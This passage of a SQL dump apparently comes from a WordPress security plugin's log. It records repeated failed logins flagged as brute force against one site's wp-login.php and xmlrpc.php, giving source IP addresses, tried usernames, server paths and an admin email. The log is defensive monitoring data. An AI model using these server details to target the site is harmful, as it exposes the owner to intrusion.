18:20:25',17744768,19232072,'https://bintara.com.my/wp-login.php',1,0,'148.72.64.192'),(24679,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.64.192\";s:11:\"REMOTE_PORT\";s:5:\"53138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEj6UViJhUiKk@yAofFmgAAAY4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568744425.33\";s:12:\"REQUEST_TIME\";s:10:\"1568744425\";}}','notice','2019-09-17 18:20:28','2019-09-17 18:20:25',17907680,19232072,'https://bintara.com.my/wp-login.php',1,0,'148.72.64.192'),(24680,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.64.192\";s:11:\"REMOTE_PORT\";s:5:\"54134\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEj7UViJhUiKk@yAofFnQAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744429.4118\";s:12:\"REQUEST_TIME\";s:10:\"1568744429\";}}','notice','2019-09-17 18:20:30','2019-09-17 18:20:29',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.64.192'),(24681,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"46320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEl70ViJhUiKk@yAofGiwAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744943.5407\";s:12:\"REQUEST_TIME\";s:10:\"1568744943\";}}','notice','2019-09-17 18:29:05','2019-09-17 18:29:04',17745320,19232776,'https://bintara.com.my/wp-login.php',1,0,'142.93.113.182'),(24682,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"46320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEl70ViJhUiKk@yAofGiwAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744943.5407\";s:12:\"REQUEST_TIME\";s:10:\"1568744943\";}}','notice','2019-09-17 18:29:05','2019-09-17 18:29:04',17906888,19232776,'https://bintara.com.my/wp-login.php',1,0,'142.93.113.182'),(24683,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"47676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEl9UViJhUiKk@yAofGjQAAAYo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568744949.7633\";s:12:\"REQUEST_TIME\";s:10:\"1568744949\";}}','notice','2019-09-17 18:29:12','2019-09-17 18:29:10',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.113.182'),(24684,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"40498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEmlX-mRYMgL5SYt2EViQAAAVc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745110.3931\";s:12:\"REQUEST_TIME\";s:10:\"1568745110\";}}','notice','2019-09-17 18:31:51','2019-09-17 18:31:50',17740112,19230080,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(24388,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.182.56.72\";s:11:\"REMOTE_PORT\";s:5:\"34326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBfbg99C9j9bhK9KplGWAAAAQI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694126.8307\";s:12:\"REQUEST_TIME\";s:10:\"1568694126\";}}','notice','2019-09-17 04:22:08','2019-09-17 04:22:07',18255856,19554928,'https://bintara.com.my/xmlrpc.php',1,0,'185.182.56.72'),(24389,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"35121\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBgTx@uZ4OC5N1Fn8E-swAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694351.2634\";s:12:\"REQUEST_TIME\";s:10:\"1568694351\";}}','notice','2019-09-17 04:25:52','2019-09-17 04:25:51',17740048,19230088,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24390,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"36019\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBgUtK-omY048@iBsMsFwAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694354.4069\";s:12:\"REQUEST_TIME\";s:10:\"1568694354\";}}','notice','2019-09-17 04:25:55','2019-09-17 